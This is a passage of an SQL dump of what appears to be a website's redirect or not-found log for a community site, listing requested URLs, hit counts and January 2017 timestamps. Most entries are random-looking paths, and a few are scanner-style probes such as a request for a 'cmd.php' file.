15:36:39','0000-00-00 00:00:00'),(4825,'http://www.hallcrestheights.org/jglet-kymd-rqzn-i20162633-rvmlkswa/k11634-zvkecqqn-eeiaqj-zlnpl-qfcneb-xilnv-oxbdjve.htm',NULL,'','',1,0,'2017-01-13 15:40:26','0000-00-00 00:00:00'),(4826,'http://www.hallcrestheights.org/zmkue-dtzj-i20162632-ivyo-qxifgxuh/k53934-xptvuhmi-wnzkor-pvubf-gnqtpm-hprbi-kzonmtl.htm',NULL,'','',1,0,'2017-01-13 15:44:13','0000-00-00 00:00:00'),(4827,'http://www.hallcrestheights.org/mrcqg-beif-i20162632-uwgr-abtnwyrq/k33234-semgwkow-hmemxg-kucyb-npzkic-vejxk-ulzjcjk.htm',NULL,'','',1,0,'2017-01-13 15:55:35','0000-00-00 00:00:00'),(4828,'http://www.hallcrestheights.org/dvisc-iwbv-wkux-i20162633-krbzomsm/k10734-vuclzuph-vqawuo-xzmnp-zvsgcr-lycmc-zoqqelu.htm',NULL,'','',1,0,'2017-01-13 16:03:08','0000-00-00 00:00:00'),(4829,'http://www.hallcrestheights.org/ixnmuea-k24958-hwhiozhj-xbnwpgey-ooayiku/ksszqc-ebaqd-i20162634-omytniho-lbde-ntafym.htm',NULL,'','',1,0,'2017-01-13 16:10:42','0000-00-00 00:00:00'),(4830,'http://www.hallcrestheights.org/ixnmuea-k31978-hwhiozhj-xbnwpgey-ooayiku/i20162632-ksszqc-ebaqd-omytniho-lbde-ntafym.htm',NULL,'','',1,0,'2017-01-13 16:14:30','0000-00-00 00:00:00'),(4831,'http://www.hallcrestheights.org/vqjnysp-k25858-vholjpeu-rrtpiluo-urxivlb/trhnnm-tqzko-i20162634-wtsxppbg-rrcd-sikibk.htm',NULL,'','',1,0,'2017-01-13 16:18:18','0000-00-00 00:00:00'),(4832,'http://www.hallcrestheights.org/k8790-edzvdlqc-omnnm-mcawvbfu-japyvrl/flxh-qjkuh-kcmumb-hmgz-i20162628-nkoheyru-pxpudzik.htm',NULL,'','',1,0,'2017-01-13 16:22:04','0000-00-00 00:00:00'),(4833,'http://www.hallcrestheights.org/fadlajf-nlgfpcvw-gmyhdecw-xbdeudk/i20162634-ovfiib-ptquh-zxchhrmx-agfp-k4758-apuhgf-qvjd.htm',NULL,'','',1,0,'2017-01-13 16:25:50','0000-00-00 00:00:00'),(4834,'http://www.hallcrestheights.org/i20162630-dvisciw-bvwkuxkr-bzomsmvu-clzuphv/qawuox-zmnpz-vsgcrlyc-mczo-k58938-qqelud-pwcm.htm',NULL,'','',1,0,'2017-01-13 16:29:38','0000-00-00 00:00:00'),(4835,'http://www.hallcrestheights.org/kzpffms-xklrd-edhwge/fvbbgz-agpec-iyyu-i20162630-wuvfzt-k57303-jigjin/',NULL,'','',1,0,'2017-01-13 16:32:03','0000-00-00 00:00:00'),(4836,'http://www.hallcrestheights.org/upttmnb-eatgrbnq-cdcncxrd-hcpgzzd/i20162634-llimvy-xjltf-eobkebwi-vsmq-k25458-krfbml-kmst.htm',NULL,'','',1,0,'2017-01-13 16:33:24','0000-00-00 00:00:00'),(4837,'http://www.hallcrestheights.org/i20162630-edzvdlq-comnnmmc-awvbfuja-pyvrlfl/xhqjku-hkcmu-mbhmgznk-ohey-k37338-rupxpu-dzik.htm',NULL,'','',1,0,'2017-01-13 16:37:17','0000-00-00 00:00:00'),(4838,'http://www.hallcrestheights.org/lugdl-trsm/k48614-xxhy-pzqjllzo-i20162632-hnjumnte-cwfogy.htm',NULL,'','',2,0,'2017-01-13 17:13:08','0000-00-00 00:00:00'),(4839,'http://www.hallcrestheights.org/k26900-ryvhrhmq-tyysl-lgeajanp-i20162635-dmefnxh.htm',NULL,'','',5,0,'2017-01-13 18:04:12','0000-00-00 00:00:00'),(4840,'http://www.hallcrestheights.org/pcscqruf-k27100-unpkw-xpoideot-wtvsoar-mosm-gepla-lheliy-i20162635-rqiy-qfufxvug.htm',NULL,'','',3,0,'2017-01-13 18:04:13','0000-00-00 00:00:00'),(4841,'http://www.hallcrestheights.org/k27000-jgletkym-drqzn-rvmlkswa-i20162635-zvkecqq-neei-aqjzl-nplqfc-nebx.htm',NULL,'','',5,0,'2017-01-13 18:04:14','0000-00-00 00:00:00'),(4842,'http://hallcrestheights.org/images/stories/cmd.php',NULL,'','',4,0,'2017-01-13 18:15:17','0000-00-00 00:00:00'),(4843,'http://hallcrestheights.org/community/press.html',NULL,'http://hallcrestheights.org/','',1,0,'2017-01-13 18:22:40','0000-00-00 00:00:00'),(4844,'http://www.hallcrestheights.org/upttmnbe-i20162635-atgrb/k25250-nqcdcncx-rdhcpgz-zdll-imvyx.htm',NULL,'','',1,0,'2017-01-13 18:23:07','0000-00-00 00:00:00'),(4845,'http://www.hallcrestheights.org/zmkue-i20162633-k5314-dtzj-ivyo/qxifgxuh-xptvuhmi-wnzkor-pvubf.htm',NULL,'','',1,0,'2017-01-13 18:30:41','0000-00-00 00:00:00'),(4846,'http://www.hallcrestheights.org/nfrkopd-obbum-golzes-k7923-rkwtzq/tqbsv-i20162631-jcwj-bxnmyv-sssldj-znaahjb-kwxro-sholv/',NULL,'','',2,0,'2017-01-13 18:33:54','0000-00-00 00:00:00'),(4847,'http://www.hallcrestheights.org/upttmnbe-atgrb-nqcdcncx/i20162635-rdhcpgz-zdll-k4450-imvyx-jltfeo.htm',NULL,'','',1,0,'2017-01-13 18:57:10','0000-00-00 00:00:00'),(4848,'http://www.hallcrestheights.org/gnfznxvj-k50770-xpalt-itjshkyj-i20162631-yldpija/amdu-rtaen-pggwtd-vlxt-dqkunfgl.htm',NULL,'','',1,0,'2017-01-13 19:00:58','0000-00-00 00:00:00'),(4849,'http://www.hallcrestheights.org/k4650-dvisciwb-vwkux-krbzomsm-vuclzup/hvqa-i20162635-wuoxz-mnpzvs-gcrl-ycmczoqq-eludpwcm.htm',NULL,'','',1,0,'2017-01-13 19:04:44','0000-00-00 00:00:00'),(4850,'http://www.hallcrestheights.org/pcscq-rufu-k1334-npkw-xpoideot/wtvsoarm-i20162633-osmgep-lalhe-liyrqi-yqfuf-xvugowo-pegtqam-zimc.htm',NULL,'','',1,0,'2017-01-13 19:08:31','0000-00-00 00:00:00'),(4851,'http://www.hallcrestheights.org/qlbowc-i20162629-iggeceay/afxr-k16199-glnik/',NULL,'','',1,0,'2017-01-13 19:12:18','0000-00-00 00:00:00'),(4852,'http://www.hallcrestheights.org/qlbowci-ggece/ayafxr-i20162631-k59723-glnikg/',NULL,'','',1,0,'2017-01-13 19:16:06','0000-00-00 00:00:00'),(4853,'http://www.hallcrestheights.org/i20162630-kzpffms-xklrd/edhwge-k46123-fvbbgz-agpec/',NULL,'','',1,0,'2017-01-13 19:19:52','0000-00-00 00:00:00'),(4854,'http://hallcrestheights.org/administration',NULL,'','',1,0,'2017-01-13 19:21:24','0000-00-00 00:00:00'),(4855,'http://www.hallcrestheights.org/bsoapaz-i20162631-apsta/sgmhcq-k59623-cmckfr-dtfkg/',NULL,'','',1,0,'2017-01-13 19:23:39','0000-00-00 00:00:00'),(4856,'http://www.hallcrestheights.org/ajqxxuc-uzaof/ifephi-i20162631-ijimjn-jbogt-k59423-sakb/',NULL,'','',1,0,'2017-01-13 19:27:26','0000-00-00 00:00:00'),(4857,'http://www.hallcrestheights.org/kzpff-msxklr-k1507-dedhw/i20162635-gefv-bbgzagp-eciyyuwu-vfztjigj/',NULL,'','',1,0,'2017-01-13 19:31:13','0000-00-00 00:00:00'),(4858,'http://www.hallcrestheights.org/yembjvh-tqqdc-kzfltz/terqbw-nswns-njpl-pftrrj-i20162631-k59823-ncypjo/',NULL,'','',1,0,'2017-01-13 19:35:00','0000-00-00 00:00:00'),(4859,'http://www.hallcrestheights.org/ajqxxu-i20162633-cuzaofif-ephi/ijimj-njbo-gtsakbc-cgyfmdv-k7839-juxzl/',NULL,'','',1,0,'2017-01-13 19:38:47','0000-00-00 00:00:00'),(4860,'http://www.hallcrestheights.org/wbwpbo-k7939-nkydhxjj-ikvf-vtzpx/bxkc-i20162633-wjybtyl-wosduie-qgwso-gxhgpi/',NULL,'','',1,0,'2017-01-13 19:46:21','0000-00-00 00:00:00'),(4861,'http://www.hallcrestheights.org/soegszx-k59023-yifet-vtndyu-i20162631-uhvfcy/zlsxx-qrox-aehksk-xyxemb-uqudtwq/',NULL,'','',1,0,'2017-01-13 19:50:08','0000-00-00 00:00:00'),(4862,'http://www.hallcrestheights.org/kzpff-msxklr-dedhw-gefv/i20162634-bbgzagp-eciyyuwu-vfztjigj-k43107-inamzbc-ngtfmlyr-ghdfi/',NULL,'','',1,0,'2017-01-13 19:53:55','0000-00-00 00:00:00'),(4863,'http://www.hallcrestheights.org/qlbow-ciggec-eayaf-xrgl/k43707-nikghhm-bbxpgesm-rcaiztbi-auwdtvi-i20162634-xpmtzhzz-wzrqr-dcfp/',NULL,'','',1,0,'2017-01-13 19:57:42','0000-00-00 00:00:00'),(4864,'http://www.hallcrestheights.org/wbwpbon-kydhx-i20162630-jjikvf-vtzpxb/xkcwj-ybty-lwosdu-ieqgws-ogxhgpi-sdhtn-irmjh-k46523-vzyxodbx/',NULL,'','',1,0,'2017-01-13 20:01:30','0000-00-00 00:00:00'),(4865,'http://www.hallcrestheights.org/i20162628-ajqxxu-cuzaofif-ephi-ijimj/njbo-gtsakbc-cgyfmdv-juxzl-ektsls-hxos-qqjvfyoi-k58799-httjputl/',NULL,'','',1,0,'2017-01-13 20:05:16','0000-00-00 00:00:00'),(4866,'http://www.hallcrestheights.org/zmkue-i20162633-dtzj/k6614-ivyo-qxifgxuh.htm',NULL,'','',1,0,'2017-01-13 20:09:03','0000-00-00 00:00:00'),(4867,'http://www.hallcrestheights.org/i20162632-edzvd-lqco/k54134-mnnm-mcawvbfu.htm',NULL,'','',1,0,'2017-01-13 20:12:51','0000-00-00 00:00:00'),(4868,'http://www.hallcrestheights.org/vqjnyspv-holjp/k16550-eurrtpil-i20162635-uourxiv.htm',NULL,'','',1,0,'2017-01-13 20:16:37','0000-00-00 00:00:00'),(4869,'http://www.hallcrestheights.org/mrcqgbei-fuwgr/k40670-abtnwyrq-i20162631-semgwko.htm',NULL,'','',1,0,'2017-01-13 20:20:24','0000-00-00 00:00:00'),(4870,'http://www.hallcrestheights.org/fadla-jfnl/i20162632-gfpc-vwgmyhde-k52234-cwxbdeud.htm',NULL,'','',1,0,'2017-01-13 20:24:12','0000-00-00 00:00:00'),(4871,'http://www.hallcrestheights.org/k4570-lugdltrs-mxxhy/i20162632-pzqjllzo-hnjumnt-ecwf.htm',NULL,'','',1,0,'2017-01-13 20:27:59','0000-00-00 00:00:00'),(4872,'http://www.hallcrestheights.org/k29590-edzvdlqc-omnnm/mcawvbfu-i20162628-japyvrl-flxh.htm',NULL,'','',1,0,'2017-01-13 20:35:32','0000-00-00 00:00:00'),(4873,'http://www.hallcrestheights.org/i20162630-vqjnysp-vholjpeu/rrtpiluo-k38338-urxivlb-trhnnm.htm',NULL,'','',1,0,'2017-01-13 20:39:19','0000-00-00 00:00:00'),(4874,'http://www.hallcrestheights.org/vqjny-spvh/k53834-oljp-eurrtpil-i20162632-uourxivl-btrhnn.htm',NULL,'','',1,0,'2017-01-13 20:43:06','0000-00-00 00:00:00'),(4875,'http://www.hallcrestheights.org/i20162628-fadlajfn-lgfpc/k30290-vwgmyhde-cwxbdeu-dkov-fiibp.htm',NULL,'','',1,0,'2017-01-13 20:46:53','0000-00-00 00:00:00'),(4876,'http://www.hallcrestheights.org/lugd-ltrsmxx/k53762-hypzq-jllzoh-njumnte-i20162633-cwfogywb.htm',NULL,'','',1,0,'2017-01-13 20:50:40','0000-00-00 00:00:00'),(4877,'http://www.hallcrestheights.org/fadlajf-nlgfpcvw/i20162630-k58838-gmyhdecw-xbdeudk-ovfiib-ptquh.htm',NULL,'','',1,0,'2017-01-13 20:54:27','0000-00-00 00:00:00'),(4878,'http://www.hallcrestheights.org/i20162632-ixnmu-eahw-hioz/hjxbnwpg-k48514-eyooayik-uksszq-cebaq.htm',NULL,'','',1,0,'2017-01-13 20:58:14','0000-00-00 00:00:00'),(4879,'http://www.hallcrestheights.org/i20162632-dvisciwb-vwkux-krbzomsm/vuclzup-k5170-hvqa-wuoxz-mnpzvs.htm',NULL,'','',1,0,'2017-01-13 21:02:01','0000-00-00 00:00:00'),(4880,'http://www.hallcrestheights.org/mrcqgbei-fuwgr-k39370-abtnwyrq/semgwko-whme-mxgku-i20162631-cybnpz.htm',NULL,'','',1,0,'2017-01-13 21:05:48','0000-00-00 00:00:00'),(4881,'http://www.hallcrestheights.org/i20162632-upttmnbe-atgrb-nqcdcncx/rdhcpgz-zdll-imvyx-k46570-jltfeo.htm',NULL,'','',1,0,'2017-01-13 21:09:35','0000-00-00 00:00:00'),(4882,'http://www.hallcrestheights.org/pcscqruf-unpkw-k36850-xpoideot/i20162635-wtvsoar-mosm-gepla-lheliy.htm',NULL,'','',1,0,'2017-01-13 21:17:09','0000-00-00 00:00:00'),(4883,'http://www.hallcrestheights.org/i20162632-vqjny-spvh-k48114-oljp/eurrtpil-uourxivl-btrhnn-mtqzk-owtsxp.htm',NULL,'','',1,0,'2017-01-13 21:20:56','0000-00-00 00:00:00'),(4884,'http://www.hallcrestheights.org/vqjnyspv-holjp-eurrtpil/uourxiv-lbtr-i20162637-hnnmt-k51390-qzkowt-sxpp.htm',NULL,'','',1,0,'2017-01-13 21:24:43','0000-00-00 00:00:00'),(4885,'http://www.hallcrestheights.org/i20162632-zmkuedtz-jivyo-qxifgxuh/xptvuhm-iwnz-korpv-k47070-ubfgnq-tpmh.htm',NULL,'','',1,0,'2017-01-13 21:28:30','0000-00-00 00:00:00'),(4886,'http://www.hallcrestheights.org/upttm-k53434-nbea-tgrb-nqcdcncx/i20162632-rdhcpgzz-dllimv-yxjlt-feobke-bwivs.htm',NULL,'','',1,0,'2017-01-13 21:32:17','0000-00-00 00:00:00'),(4887,'http://www.hallcrestheights.org/mrcqg-k11134-beif-uwgr-abtnwyrq/semgwkow-i20162633-hmemxg-kucyb-npzkic-vejxk.htm',NULL,'','',1,0,'2017-01-13 21:36:04','0000-00-00 00:00:00'),(4888,'http://www.hallcrestheights.org/ixnmuea-hwhiozhj-i20162634-xbnwpgey/ooayiku-ksszqc-ebaqd-k4158-omytniho-lbde.htm',NULL,'','',1,0,'2017-01-13 21:39:51','0000-00-00 00:00:00'),(4889,'http://www.hallcrestheights.org/i20162628-jgletkym-k9190-drqzn-rvmlkswa-zvkecqq/neei-aqjzl-nplqfc-nebx-ilnvoxbd.htm',NULL,'','',1,0,'2017-01-13 21:43:38','0000-00-00 00:00:00'),(4890,'http://www.hallcrestheights.org/edzvdlqc-k26470-omnnm-mcawvbfu-japyvrl/i20162632-flxh-qjkuh-kcmumb-hmgz-nkoheyru.htm',NULL,'','',1,0,'2017-01-13 21:47:25','0000-00-00 00:00:00'),(4891,'http://www.hallcrestheights.org/gnfzn-xvjx-palt-i20162633-itjshkyj/k6414-yldpijaa-mdurta-enpgg-wtdvlx-tdqku-nfglqrh.htm',NULL,'','',1,0,'2017-01-13 21:51:14','0000-00-00 00:00:00'),(4892,'http://www.hallcrestheights.org/ryvhr-hmqt-i20162632-yysl-lgeajanp/k48714-dmefnxhq-fhjdyh-aoxrc-jhwuvd-svezy-twlcycw.htm',NULL,'','',1,0,'2017-01-13 21:54:59','0000-00-00 00:00:00'),(4893,'http://www.hallcrestheights.org/jgletky-k37738-mdrqznrv-i20162630-mlkswazv-kecqqne/eiaqjz-lnplq-fcnebxil-nvox-bdjvee.htm',NULL,'','',1,0,'2017-01-13 21:58:46','0000-00-00 00:00:00'),(4894,'http://www.hallcrestheights.org/k39570-ixnmueah-i20162631-whioz-hjxbnwpg-eyooayi/kuks-szqce-baqdom-ytni-holbdent-afymluze.htm',NULL,'','',1,0,'2017-01-13 22:02:33','0000-00-00 00:00:00'),(4895,'http://www.hallcrestheights.org/k25170-edzvdlqc-omnnm-i20162632-mcawvbfu-japyvrl/flxh-qjkuh-kcmumb-hmgz-nkoheyru-pxpudzik.htm',NULL,'','',1,0,'2017-01-13 22:06:20','0000-00-00 00:00:00'),(4896,'http://www.hallcrestheights.org/k29490-mrcqgbei-fuwgr-abtnwyrq-semgwko/whme-mxgku-cybnpz-kicv-i20162628-ejxkulzj-cjkntsxj.htm',NULL,'','',1,0,'2017-01-13 22:10:07','0000-00-00 00:00:00'),(4897,'http://hallcrestheights.org/community/real-estate-guide.html/modules/',NULL,'','',1,0,'2017-01-13 22:16:02','0000-00-00 00:00:00'),(4898,'http://hallcrestheights.org/community/real-estate-guide.html/plugins/',NULL,'','',1,0,'2017-01-13 22:16:04','0000-00-00 00:00:00'),(4899,'http://www.hallcrestheights.org/vqjnysp-vholjpeu-i20162632-rrtpiluo-urxivlb/trhnnm-tqzko-wtsxppbg-rrcd-k31578-sikibk-xnpf.htm',NULL,'','',1,0,'2017-01-13 22:17:41','0000-00-00 00:00:00'),(4900,'http://www.hallcrestheights.org/k47670-jgletkym-drqzn-i20162632-rvmlkswa-zvkecqq/neei-aqjzl-nplqfc-nebx-ilnvoxbd-jveebikp.htm',NULL,'','',1,0,'2017-01-13 22:21:28','0000-00-00 00:00:00'),(4901,'http://www.hallcrestheights.org/k46770-dvisciwb-vwkux-i20162632-krbzomsm-vuclzup/hvqa-wuoxz-mnpzvs-gcrl-ycmczoqq-eludpwcm.htm',NULL,'','',1,0,'2017-01-13 22:25:16','0000-00-00 00:00:00'),(4902,'http://www.hallcrestheights.org/k26700-ixnmueah-whioz-hjxbnwpg-eyooayi-kuks-i20162635-szqce-baqdom-ytni-holbdent-afymluze.htm',NULL,'https://www.google.co.jp/','',8,0,'2017-01-13 22:25:36','0000-00-00 00:00:00'),(4903,'http://www.hallcrestheights.org/k26070-gnfznxvj-xpalt-i20162632-itjshkyj-yldpija/amdu-rtaen-pggwtd-vlxt-dqkunfgl-qrhzyonx.htm',NULL,'','',1,0,'2017-01-13 22:29:02','0000-00-00 00:00:00'),(4904,'http://www.hallcrestheights.org/k37050-fadlajfn-lgfpc-vwgmyhde-cwxbdeu/dkov-i20162635-fiibp-tquhzx-chhr-mxagfpap-uhgfqvjd.htm',NULL,'','',1,0,'2017-01-13 22:32:49','0000-00-00 00:00:00'),(4905,'http://www.hallcrestheights.org/dvis-ciwbvwk-k32262-uxkrb-zomsmv/i20162634-uclzuph-vqawuoxz-mnpzvsg-crlycmcz-oqqe-ludpwcme.htm',NULL,'','',1,0,'2017-01-13 22:36:36','0000-00-00 00:00:00'),(4906,'http://www.hallcrestheights.org/fadl-ajfnlgf-k52962-pcvwg-i20162633-myhdec/wxbdeud-kovfiibp-tquhzxc-hhrmxagf-papu-hgfqvjdc.htm',NULL,'','',1,0,'2017-01-13 22:40:23','0000-00-00 00:00:00'),(4907,'http://www.hallcrestheights.org/gnfz-nxvjxpa-k11562-ltitj-shkyjy/i20162634-ldpijaa-mdurtaen-pggwtdv-lxtdqkun-fglq-rhzyonxf.htm',NULL,'','',1,0,'2017-01-13 22:44:09','0000-00-00 00:00:00'),(4908,'http://www.hallcrestheights.org/fadlajf-k42328-nlgfpcvw-gmyhdecw-xbdeudk-i20162632-ovfiib-ptquh-zxchhrmx-agfp-apuhgf.htm',NULL,'','',5,0,'2017-01-13 22:47:26','0000-00-00 00:00:00'),(4909,'http://www.hallcrestheights.org/upttm-nbea-tgrb-nqcdcncx/rdhcpgzz-dllimv-yxjlt-i20162633-feobke-bwivs-k6114-mqkrfbm-lkmstho.htm',NULL,'','',1,0,'2017-01-13 22:47:56','0000-00-00 00:00:00'),(4910,'http://www.hallcrestheights.org/dvisc-iwbv-wkux-krbzomsm/vuclzuph-vqawuo-i20162632-xzmnp-zvsgcr-lycmc-k53634-zoqqelu-dpwcmeg.htm',NULL,'','',1,0,'2017-01-13 22:51:44','0000-00-00 00:00:00'),(4911,'http://www.hallcrestheights.org/k32934-gnfzn-xvjx-palt-itjshkyj/yldpijaa-mdurta-i20162632-enpgg-wtdvlx-tdqku-nfglqrh-zyonxfe.htm',NULL,'','',1,0,'2017-01-13 22:55:30','0000-00-00 00:00:00'),(4912,'http://www.hallcrestheights.org/i20162637-ixnmu-eahw-hioz-hjxbnwpg/k11334-eyooayik-uksszq-cebaq-domytn-iholb-dentafy-mluzext.htm',NULL,'','',1,0,'2017-01-13 23:03:05','0000-00-00 00:00:00'),(4913,'http://www.hallcrestheights.org/k9966-pcscqr-ufunpk-wxpoid-eotw/tvsoar-mosmge-plalh-eliyrqi-yqfufxv-i20162635-ugowop-egtqamz.htm',NULL,'','',1,0,'2017-01-13 23:06:52','0000-00-00 00:00:00'),(4914,'http://www.hallcrestheights.org/ixnmu-eahw-hioz-hjxbnwpg/eyooayik-k27714-uksszq-cebaq-i20162633-domytn-iholb-dentafy-mluzext.htm',NULL,'','',1,0,'2017-01-13 23:10:39','0000-00-00 00:00:00'),(4915,'http://www.hallcrestheights.org/pcscq-rufu-npkw-xpoideot/wtvsoarm-osmgep-k10434-lalhe-i20162633-liyrqi-yqfuf-xvugowo-pegtqam.htm',NULL,'','',1,0,'2017-01-13 23:14:26','0000-00-00 00:00:00'),(4916,'http://www.hallcrestheights.org/ryvhrhm-k25158-qtyysllg-eajanpdm-efnxhqf/hjdyha-oxrcj-hwuvdsve-zytw-i20162634-lcycws-cpua-kqnj.htm',NULL,'','',1,0,'2017-01-13 23:18:13','0000-00-00 00:00:00'),(4917,'http://www.hallcrestheights.org/upttmnb-eatgrbnq-cdcncxrd-hcpgzzd/i20162630-llimvy-xjltf-eobkebwi-vsmq-krfbml-kmst-k37938-howg.htm',NULL,'','',1,0,'2017-01-13 23:22:00','0000-00-00 00:00:00'),(4918,'http://www.hallcrestheights.org/soegs-zxyife/tvtnd-i20162635-k11807-yuuh/',NULL,'','',1,0,'2017-01-13 23:25:47','0000-00-00 00:00:00'),(4919,'http://www.hallcrestheights.org/htxwh-ykrsvs/i20162634-vhudy-k53207-kbqx/',NULL,'','',1,0,'2017-01-13 23:29:34','0000-00-00 00:00:00'),(4920,'http://www.hallcrestheights.org/pcscqruf-unpkw-xpoideot-wtvsoar/mosm-gepla-i20162632-k46470-lheliy-rqiy-qfufxvug-owopegtq-amzimc.htm',NULL,'','',1,0,'2017-01-13 23:33:21','0000-00-00 00:00:00'),(4921,'http://www.hallcrestheights.org/ixnmueah-whioz-hjxbnwpg-eyooayi/kuks-szqce-baqdom-ytni-holbdent-i20162635-afymluze-k16950-xtlfgg.htm',NULL,'','',1,0,'2017-01-13 23:37:08','0000-00-00 00:00:00'),(4922,'http://www.hallcrestheights.org/i20162637-jgletkym-drqzn-rvmlkswa-k50790-zvkecqq/neei-aqjzl-nplqfc-nebx-ilnvoxbd-jveebikp-tjvlxf.htm',NULL,'','',1,0,'2017-01-13 23:40:55','0000-00-00 00:00:00'),(4923,'http://www.hallcrestheights.org/lugdltrs-mxxhy-pzqjllzo-hnjumnt/ecwf-k36030-ogywb-iwyrur-fgvf-cwqzhrib-nknyfeeb-i20162636-sbjhfk.htm',NULL,'','',1,0,'2017-01-13 23:44:41','0000-00-00 00:00:00'),(4924,'http://www.hallcrestheights.org/fadlajfn-lgfpc-vwgmyhde-cwxbdeu/dkov-i20162631-fiibp-tquhzx-chhr-mxagfpap-k40170-uhgfqvjd-clbbvz.htm',NULL,'','',1,0,'2017-01-13 23:48:29','0000-00-00 00:00:00'),(4925,'http://www.hallcrestheights.org/gnfznxvj-xpalt-i20162628-itjshkyj-yldpija/amdu-rtaen-pggwtd-k29190-vlxt-dqkunfgl-qrhzyonx-feqnzs.htm',NULL,'','',1,0,'2017-01-13 23:52:16','0000-00-00 00:00:00'),(4926,'http://www.hallcrestheights.org/vqjnyspv-holjp-eurrtpil-uourxiv/lbtr-hnnmt-i20162632-qzkowt-sxpp-bgrrcdsi-kibkxnpf-k24870-ovpyay.htm',NULL,'','',1,0,'2017-01-13 23:56:03','0000-00-00 00:00:00'),(4927,'http://www.hallcrestheights.org/upttmnbe-atgrb-nqcdcncx-rdhcpgz/zdll-imvyx-i20162632-jltfeo-bkeb-k25770-wivsmqkr-fbmlkmst-howgwh.htm',NULL,'','',1,0,'2017-01-13 23:59:50','0000-00-00 00:00:00'),(4928,'http://www.hallcrestheights.org/tkuykf-i20162629-jdnjjbuc/yupa-k5399-jaylr/',NULL,'','',1,0,'2017-01-14 00:07:24','0000-00-00 00:00:00'),(4929,'http://www.hallcrestheights.org/ixnm-ueahwhi-ozhjx-bnwpge/yooayik-k32862-uksszqce-baqdomy-tniholbd-i20162634-enta-fymluzex-tlfggcsd.htm',NULL,'','',1,0,'2017-01-14 00:11:11','0000-00-00 00:00:00'),(4930,'http://www.hallcrestheights.org/gnfz-k54462-nxvjxpa-ltitj-shkyjy/ldpijaa-mdurtaen-pggwtdv-i20162633-lxtdqkun-fglq-rhzyonxf-eqnzsvvb.htm',NULL,'','',1,0,'2017-01-14 00:14:58','0000-00-00 00:00:00'),(4931,'http://www.hallcrestheights.org/fadlajf-nlgfpcvw-k10478-gmyhdecw-xbdeudk/ovfiib-i20162633-ptquh-zxchhrmx-agfp-apuhgf-qvjd-clbb-vzgrc.htm',NULL,'','',1,0,'2017-01-14 00:18:45','0000-00-00 00:00:00'),(4932,'http://www.hallcrestheights.org/lugdltr-smxxhypz-k25058-qjllzohn-jumntec/wfogyw-biwyr-i20162634-urfgvfcw-qzhr-ibnkny-feeb-sbjh-fkwet.htm',NULL,'','',1,0,'2017-01-14 00:22:32','0000-00-00 00:00:00'),(4933,'http://www.hallcrestheights.org/i20162632-oiyizg-olrcmwfb/snop-k40139-dgfnh/',NULL,'','',1,0,'2017-01-14 00:26:19','0000-00-00 00:00:00'),(4934,'http://www.hallcrestheights.org/vqjnyspv-k5500-holjp-eurrtpil-uourxiv-lbtr-hnnmt-qzkowt-i20162635-sxpp-bgrrcdsi.htm',NULL,'','',8,0,'2017-01-14 00:32:46','0000-00-00 00:00:00'),(4935,'http://www.hallcrestheights.org/i20162628-bsoapa-zapstasg/mhcq-k48599-cmckf/',NULL,'','',1,0,'2017-01-14 00:33:53','0000-00-00 00:00:00'),(4936,'http://www.hallcrestheights.org/i20162628-kzpffm-sxklrded/hwge-k46799-fvbbg/',NULL,'','',2,0,'2017-01-14 00:37:40','0000-00-00 00:00:00'),(4937,'http://www.hallcrestheights.org/htxwhy-i20162633-krsvsvhu/dykb-k17639-qxdos/',NULL,'','',1,0,'2017-01-14 00:41:27','0000-00-00 00:00:00'),(4938,'http://www.hallcrestheights.org/lugdltrs-mxxhy-k5870-pzqjllzo-hnjumnt/i20162632-ecwf-ogywb-iwyrur-fgvf-cwqzhrib-nknyfeeb-sbjhfk-wetbro.htm',NULL,'','',1,0,'2017-01-14 00:45:14','0000-00-00 00:00:00'),(4939,'http://www.hallcrestheights.org/i20162628-pcscqruf-unpkw-k9290-xpoideot-wtvsoar/mosm-gepla-lheliy-rqiy-qfufxvug-owopegtq-amzimc-zjvhoh.htm',NULL,'','',1,0,'2017-01-14 00:49:00','0000-00-00 00:00:00'),(4940,'http://www.hallcrestheights.org/vqjnyspv-holjp-k39170-eurrtpil-i20162631-uourxiv/lbtr-hnnmt-qzkowt-sxpp-bgrrcdsi-kibkxnpf-ovpyay-bgoynk.htm',NULL,'','',1,0,'2017-01-14 00:52:48','0000-00-00 00:00:00'),(4941,'http://www.hallcrestheights.org/pcscqruf-unpkw-k25670-xpoideot-wtvsoar/i20162632-mosm-gepla-lheliy-rqiy-qfufxvug-owopegtq-amzimc-zjvhoh.htm',NULL,'','',1,0,'2017-01-14 00:56:35','0000-00-00 00:00:00'),(4942,'http://www.hallcrestheights.org/ixnmueah-whioz-k26570-hjxbnwpg-eyooayi/i20162632-kuks-szqce-baqdom-ytni-holbdent-afymluze-xtlfgg-csdimr.htm',NULL,'','',1,0,'2017-01-14 01:04:09','0000-00-00 00:00:00'),(4943,'http://www.hallcrestheights.org/i20162628-dvisciwb-vwkux-k29090-krbzomsm-vuclzup/hvqa-wuoxz-mnpzvs-gcrl-ycmczoqq-eludpwcm-egiapx-mxikii.htm',NULL,'','',1,0,'2017-01-14 01:07:56','0000-00-00 00:00:00'),(4944,'http://www.hallcrestheights.org/wbwpbon-kydhx/i20162630-jjikvf-k47303-vtzpxb/',NULL,'','',1,0,'2017-01-14 01:19:17','0000-00-00 00:00:00'),(4945,'http://www.hallcrestheights.org/bsoapaz-apsta/i20162630-sgmhcq-k57023-cmckfr/',NULL,'','',1,0,'2017-01-14 01:23:04','0000-00-00 00:00:00'),(4946,'http://www.hallcrestheights.org/qlbowci-ggece/i20162630-ayafxr-k36323-glnikg/',NULL,'','',1,0,'2017-01-14 01:26:51','0000-00-00 00:00:00'),(4947,'http://www.hallcrestheights.org/jgletkym-drqzn-k46370-rvmlkswa-zvkecqq/i20162632-neei-aqjzl-nplqfc-nebx-ilnvoxbd-jveebikp-tjvlxf-ayeaya.htm',NULL,'','',1,0,'2017-01-14 01:30:38','0000-00-00 00:00:00'),(4948,'http://www.hallcrestheights.org/wbwpbonk-i20162633-ydhx/jjikvfv-k7991-tzpxbxkc/',NULL,'','',1,0,'2017-01-14 01:34:25','0000-00-00 00:00:00'),(4949,'http://www.hallcrestheights.org/soegszxy-ifet/vtndyuu-i20162631-k62351-hvfcyzls/',NULL,'','',1,0,'2017-01-14 01:38:12','0000-00-00 00:00:00'),(4950,'http://www.hallcrestheights.org/soegszxy-ifet/i20162634-vtndyuu-k55331-hvfcyzls/',NULL,'','',1,0,'2017-01-14 01:41:58','0000-00-00 00:00:00'),(4951,'http://www.hallcrestheights.org/nfrkopdo-bbum/i20162634-golzesr-k56231-kwtzqtqb/',NULL,'','',1,0,'2017-01-14 01:45:46','0000-00-00 